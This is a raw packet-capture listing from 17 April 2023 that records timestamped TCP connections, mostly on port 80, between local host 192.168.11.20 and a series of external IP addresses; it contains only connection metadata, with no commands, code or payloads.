                                                                                            Apr 17, 2023 08:57:46.009944916 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.009944916 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.009951115 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.009993076 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.010041952 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.010041952 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.010139942 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.171720982 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.171736956 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.171869993 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.171878099 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.171933889 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.171948910 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.171982050 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.171993971 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172004938 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172010899 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.172027111 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172038078 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172066927 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172079086 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172090054 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172101021 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172126055 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172137022 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172137976 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.172137976 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.172147989 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172158957 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172187090 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.172187090 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.172187090 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.172188044 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172199965 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172211885 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172223091 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172241926 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172252893 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172282934 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172283888 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.172293901 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172313929 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172327042 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172344923 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.172344923 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.172352076 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172363043 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172374010 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172382116 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.172382116 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.172382116 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.172382116 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.172384977 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172395945 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172405958 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172416925 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172426939 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172430992 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.172437906 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172449112 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172460079 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172470093 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172481060 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.172528982 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.172528982 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.172528982 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.172578096 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.172578096 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.172677040 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.334255934 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.334270954 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.334342957 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.334361076 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.334372044 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.334383965 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.334403992 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.334403992 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.334430933 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.334486961 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.334497929 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.334498882 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.334547043 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.334595919 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.334595919 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.334608078 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.334619999 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.334630013 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.334640980 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.334651947 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.334697008 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.334709883 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.334721088 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.334747076 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.334747076 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.334747076 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.334764957 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.334775925 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.334794998 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.334820032 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.334822893 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.334822893 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.334824085 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.334829092 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.334839106 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.334844112 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.334861040 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.334872007 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.334892988 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.334942102 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.334942102 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.334988117 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.334990025 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.334990978 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.334991932 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.334991932 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.334991932 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.335001945 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335022926 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335033894 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335040092 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.335043907 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335055113 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335066080 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335077047 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335087061 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335088968 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.335120916 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335131884 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335139036 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.335139036 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.335139036 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.335141897 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335153103 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335164070 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335175037 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335185051 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335196018 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335206032 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335226059 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335236073 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.335237026 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335247993 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335258961 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335278034 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335289001 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335299969 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335300922 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.335300922 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.335309982 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335349083 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.335402012 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.335402012 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.335402012 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.335448027 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.335465908 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335468054 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335469007 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335469961 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335469961 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335470915 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335470915 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335472107 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335472107 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335473061 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335473061 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335474014 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335485935 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335496902 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335508108 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335520029 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335633993 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335635900 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335635900 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335637093 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335638046 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335638046 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335639000 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335639000 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.335643053 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.335644007 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.335691929 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.335691929 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.335740089 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.335791111 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.335791111 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.335838079 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.335838079 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.335838079 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.335838079 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:51.174832106 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:51.174968004 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:58:06.543286085 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:58:23.504304886 CEST49831443192.168.11.202.23.209.40
                                                                                            Apr 17, 2023 08:58:23.514595985 CEST443498312.23.209.40192.168.11.20
                                                                                            Apr 17, 2023 08:58:23.514694929 CEST443498312.23.209.40192.168.11.20
                                                                                            Apr 17, 2023 08:58:23.514715910 CEST49831443192.168.11.202.23.209.40
                                                                                            Apr 17, 2023 08:58:23.514796972 CEST49831443192.168.11.202.23.209.40
                                                                                            Apr 17, 2023 08:58:34.805849075 CEST4985680192.168.11.20164.155.209.181
                                                                                            Apr 17, 2023 08:58:34.965207100 CEST8049856164.155.209.181192.168.11.20
                                                                                            Apr 17, 2023 08:58:34.965447903 CEST4985680192.168.11.20164.155.209.181
                                                                                            Apr 17, 2023 08:58:34.965521097 CEST4985680192.168.11.20164.155.209.181
                                                                                            Apr 17, 2023 08:58:35.124856949 CEST8049856164.155.209.181192.168.11.20
                                                                                            Apr 17, 2023 08:58:35.133346081 CEST8049856164.155.209.181192.168.11.20
                                                                                            Apr 17, 2023 08:58:35.133361101 CEST8049856164.155.209.181192.168.11.20
                                                                                            Apr 17, 2023 08:58:35.133670092 CEST4985680192.168.11.20164.155.209.181
                                                                                            Apr 17, 2023 08:58:35.133670092 CEST4985680192.168.11.20164.155.209.181
                                                                                            Apr 17, 2023 08:58:35.292942047 CEST8049856164.155.209.181192.168.11.20
                                                                                            Apr 17, 2023 08:58:55.329927921 CEST4986080192.168.11.2015.197.142.173
                                                                                            Apr 17, 2023 08:58:55.340465069 CEST804986015.197.142.173192.168.11.20
                                                                                            Apr 17, 2023 08:58:55.340686083 CEST4986080192.168.11.2015.197.142.173
                                                                                            Apr 17, 2023 08:58:55.340785027 CEST4986080192.168.11.2015.197.142.173
                                                                                            Apr 17, 2023 08:58:55.351138115 CEST804986015.197.142.173192.168.11.20
                                                                                            Apr 17, 2023 08:58:55.384812117 CEST804986015.197.142.173192.168.11.20
                                                                                            Apr 17, 2023 08:58:55.384872913 CEST804986015.197.142.173192.168.11.20
                                                                                            Apr 17, 2023 08:58:55.385114908 CEST4986080192.168.11.2015.197.142.173
                                                                                            Apr 17, 2023 08:58:55.385114908 CEST4986080192.168.11.2015.197.142.173
                                                                                            Apr 17, 2023 08:58:55.395677090 CEST804986015.197.142.173192.168.11.20
                                                                                            Apr 17, 2023 08:59:15.588749886 CEST4986180192.168.11.20185.53.179.90
                                                                                            Apr 17, 2023 08:59:15.608331919 CEST8049861185.53.179.90192.168.11.20
                                                                                            Apr 17, 2023 08:59:15.608536959 CEST4986180192.168.11.20185.53.179.90
                                                                                            Apr 17, 2023 08:59:15.628029108 CEST8049861185.53.179.90192.168.11.20
                                                                                            Apr 17, 2023 08:59:15.628216982 CEST4986180192.168.11.20185.53.179.90
                                                                                            Apr 17, 2023 08:59:15.647587061 CEST8049861185.53.179.90192.168.11.20
                                                                                            Apr 17, 2023 08:59:15.647727013 CEST8049861185.53.179.90192.168.11.20
                                                                                            Apr 17, 2023 08:59:15.647741079 CEST8049861185.53.179.90192.168.11.20
                                                                                            Apr 17, 2023 08:59:15.647958040 CEST4986180192.168.11.20185.53.179.90
                                                                                            Apr 17, 2023 08:59:15.647958040 CEST4986180192.168.11.20185.53.179.90
                                                                                            Apr 17, 2023 08:59:15.667350054 CEST8049861185.53.179.90192.168.11.20
                                                                                            Apr 17, 2023 08:59:35.926268101 CEST4986380192.168.11.2066.29.154.110
                                                                                            Apr 17, 2023 08:59:36.098128080 CEST804986366.29.154.110192.168.11.20
                                                                                            Apr 17, 2023 08:59:36.098289013 CEST4986380192.168.11.2066.29.154.110
                                                                                            Apr 17, 2023 08:59:36.098406076 CEST4986380192.168.11.2066.29.154.110
                                                                                            Apr 17, 2023 08:59:36.270709038 CEST804986366.29.154.110192.168.11.20
                                                                                            Apr 17, 2023 08:59:36.271394014 CEST804986366.29.154.110192.168.11.20
                                                                                            Apr 17, 2023 08:59:36.271452904 CEST804986366.29.154.110192.168.11.20
                                                                                            Apr 17, 2023 08:59:36.271775007 CEST4986380192.168.11.2066.29.154.110
                                                                                            Apr 17, 2023 08:59:36.271845102 CEST4986380192.168.11.2066.29.154.110
                                                                                            Apr 17, 2023 08:59:36.444508076 CEST804986366.29.154.110192.168.11.20
                                                                                            Apr 17, 2023 08:59:57.886092901 CEST4986480192.168.11.20160.121.87.199
                                                                                            Apr 17, 2023 08:59:58.154563904 CEST8049864160.121.87.199192.168.11.20
                                                                                            Apr 17, 2023 08:59:58.154736996 CEST4986480192.168.11.20160.121.87.199
                                                                                            Apr 17, 2023 08:59:58.155635118 CEST4986480192.168.11.20160.121.87.199
                                                                                            Apr 17, 2023 08:59:58.426502943 CEST8049864160.121.87.199192.168.11.20
                                                                                            Apr 17, 2023 08:59:58.426613092 CEST8049864160.121.87.199192.168.11.20
                                                                                            Apr 17, 2023 08:59:58.426625013 CEST8049864160.121.87.199192.168.11.20
                                                                                            Apr 17, 2023 08:59:58.426975012 CEST4986480192.168.11.20160.121.87.199
                                                                                            Apr 17, 2023 08:59:58.426975012 CEST4986480192.168.11.20160.121.87.199
                                                                                            Apr 17, 2023 08:59:58.695229053 CEST8049864160.121.87.199192.168.11.20
                                                                                            Apr 17, 2023 09:00:38.754884958 CEST4986680192.168.11.2034.102.136.180
                                                                                            Apr 17, 2023 09:00:38.770719051 CEST804986634.102.136.180192.168.11.20
                                                                                            Apr 17, 2023 09:00:38.770994902 CEST4986680192.168.11.2034.102.136.180
                                                                                            Apr 17, 2023 09:00:38.770996094 CEST4986680192.168.11.2034.102.136.180
                                                                                            Apr 17, 2023 09:00:38.786729097 CEST804986634.102.136.180192.168.11.20
                                                                                            Apr 17, 2023 09:00:38.883100986 CEST804986634.102.136.180192.168.11.20
                                                                                            Apr 17, 2023 09:00:38.883162975 CEST804986634.102.136.180192.168.11.20
                                                                                            Apr 17, 2023 09:00:38.883428097 CEST4986680192.168.11.2034.102.136.180
                                                                                            Apr 17, 2023 09:00:38.883490086 CEST4986680192.168.11.2034.102.136.180
                                                                                            Apr 17, 2023 09:00:38.890722990 CEST804986634.102.136.180192.168.11.20
                                                                                            Apr 17, 2023 09:00:59.228841066 CEST4986780192.168.11.20188.114.96.3
                                                                                            Apr 17, 2023 09:00:59.237658978 CEST8049867188.114.96.3192.168.11.20
                                                                                            Apr 17, 2023 09:00:59.237869978 CEST4986780192.168.11.20188.114.96.3
                                                                                            Apr 17, 2023 09:00:59.237935066 CEST4986780192.168.11.20188.114.96.3
                                                                                            Apr 17, 2023 09:00:59.246732950 CEST8049867188.114.96.3192.168.11.20
                                                                                            Apr 17, 2023 09:00:59.449495077 CEST8049867188.114.96.3192.168.11.20
                                                                                            Apr 17, 2023 09:00:59.449553967 CEST8049867188.114.96.3192.168.11.20
                                                                                            Apr 17, 2023 09:00:59.449907064 CEST4986780192.168.11.20188.114.96.3
                                                                                            Apr 17, 2023 09:00:59.449907064 CEST4986780192.168.11.20188.114.96.3
                                                                                            Apr 17, 2023 09:00:59.458826065 CEST8049867188.114.96.3192.168.11.20
                                                                                            Apr 17, 2023 09:01:19.896219015 CEST4986880192.168.11.2064.246.164.134
                                                                                            Apr 17, 2023 09:01:20.051553965 CEST804986864.246.164.134192.168.11.20
                                                                                            Apr 17, 2023 09:01:20.051729918 CEST4986880192.168.11.2064.246.164.134
                                                                                            Apr 17, 2023 09:01:20.051949978 CEST4986880192.168.11.2064.246.164.134
                                                                                            Apr 17, 2023 09:01:20.250061989 CEST804986864.246.164.134192.168.11.20
                                                                                            Apr 17, 2023 09:01:20.341221094 CEST804986864.246.164.134192.168.11.20
                                                                                            Apr 17, 2023 09:01:20.341259003 CEST804986864.246.164.134192.168.11.20
                                                                                            Apr 17, 2023 09:01:20.341562033 CEST4986880192.168.11.2064.246.164.134
                                                                                            Apr 17, 2023 09:01:20.341696978 CEST4986880192.168.11.2064.246.164.134
                                                                                            Apr 17, 2023 09:01:20.496737003 CEST804986864.246.164.134192.168.11.20
                                                                                            Apr 17, 2023 09:01:40.684528112 CEST4987080192.168.11.2081.171.22.5
                                                                                            Apr 17, 2023 09:01:40.701530933 CEST804987081.171.22.5192.168.11.20
                                                                                            Apr 17, 2023 09:01:40.702001095 CEST4987080192.168.11.2081.171.22.5
                                                                                            Apr 17, 2023 09:01:40.702073097 CEST4987080192.168.11.2081.171.22.5
                                                                                            Apr 17, 2023 09:01:40.719099045 CEST804987081.171.22.5192.168.11.20
                                                                                            Apr 17, 2023 09:01:40.736366987 CEST804987081.171.22.5192.168.11.20
                                                                                            Apr 17, 2023 09:01:40.736464977 CEST804987081.171.22.5192.168.11.20
                                                                                            Apr 17, 2023 09:01:40.736697912 CEST4987080192.168.11.2081.171.22.5
                                                                                            Apr 17, 2023 09:01:40.753654003 CEST804987081.171.22.5192.168.11.20
                                                                                            Apr 17, 2023 09:02:00.942902088 CEST4987180192.168.11.20185.53.179.90
                                                                                            Apr 17, 2023 09:02:00.961863041 CEST8049871185.53.179.90192.168.11.20
                                                                                            Apr 17, 2023 09:02:00.962091923 CEST4987180192.168.11.20185.53.179.90
                                                                                            Apr 17, 2023 09:02:00.981129885 CEST8049871185.53.179.90192.168.11.20
                                                                                            Apr 17, 2023 09:02:00.981312037 CEST4987180192.168.11.20185.53.179.90
                                                                                            Apr 17, 2023 09:02:01.000287056 CEST8049871185.53.179.90192.168.11.20
                                                                                            Apr 17, 2023 09:02:01.000396967 CEST8049871185.53.179.90192.168.11.20
                                                                                            Apr 17, 2023 09:02:01.000447035 CEST8049871185.53.179.90192.168.11.20
                                                                                            Apr 17, 2023 09:02:01.000778913 CEST4987180192.168.11.20185.53.179.90
                                                                                            Apr 17, 2023 09:02:01.019846916 CEST8049871185.53.179.90192.168.11.20
                                                                                            Apr 17, 2023 09:02:21.283991098 CEST4987280192.168.11.20185.53.179.91
                                                                                            Apr 17, 2023 09:02:21.302582026 CEST8049872185.53.179.91192.168.11.20
                                                                                            Apr 17, 2023 09:02:21.302917004 CEST4987280192.168.11.20185.53.179.91
                                                                                            Apr 17, 2023 09:02:21.321624994 CEST8049872185.53.179.91192.168.11.20
                                                                                            Apr 17, 2023 09:02:21.321873903 CEST4987280192.168.11.20185.53.179.91
                                                                                            Apr 17, 2023 09:02:21.340643883 CEST8049872185.53.179.91192.168.11.20
                                                                                            Apr 17, 2023 09:02:21.340714931 CEST8049872185.53.179.91192.168.11.20
                                                                                            Apr 17, 2023 09:02:21.340759993 CEST8049872185.53.179.91192.168.11.20
                                                                                            Apr 17, 2023 09:02:21.340986967 CEST4987280192.168.11.20185.53.179.91
                                                                                            Apr 17, 2023 09:02:21.340987921 CEST4987280192.168.11.20185.53.179.91
                                                                                            Apr 17, 2023 09:02:21.359832048 CEST8049872185.53.179.91192.168.11.20
                                                                                            Apr 17, 2023 09:02:41.624820948 CEST4987380192.168.11.2034.117.168.233
                                                                                            Apr 17, 2023 09:02:41.631855011 CEST804987334.117.168.233192.168.11.20
                                                                                            Apr 17, 2023 09:02:41.632075071 CEST4987380192.168.11.2034.117.168.233
                                                                                            Apr 17, 2023 09:02:41.632143021 CEST4987380192.168.11.2034.117.168.233
                                                                                            Apr 17, 2023 09:02:41.639277935 CEST804987334.117.168.233192.168.11.20
                                                                                            Apr 17, 2023 09:02:41.706233025 CEST804987334.117.168.233192.168.11.20
                                                                                            Apr 17, 2023 09:02:41.706294060 CEST804987334.117.168.233192.168.11.20
                                                                                            Apr 17, 2023 09:02:41.706623077 CEST4987380192.168.11.2034.117.168.233
                                                                                            Apr 17, 2023 09:02:41.706686974 CEST4987380192.168.11.2034.117.168.233
                                                                                            Apr 17, 2023 09:02:41.713812113 CEST804987334.117.168.233192.168.11.20
                                                                                            Apr 17, 2023 09:03:02.864145994 CEST4987580192.168.11.2034.117.26.57
                                                                                            Apr 17, 2023 09:03:02.871332884 CEST804987534.117.26.57192.168.11.20
                                                                                            Apr 17, 2023 09:03:02.871537924 CEST4987580192.168.11.2034.117.26.57
                                                                                            Apr 17, 2023 09:03:02.871603966 CEST4987580192.168.11.2034.117.26.57
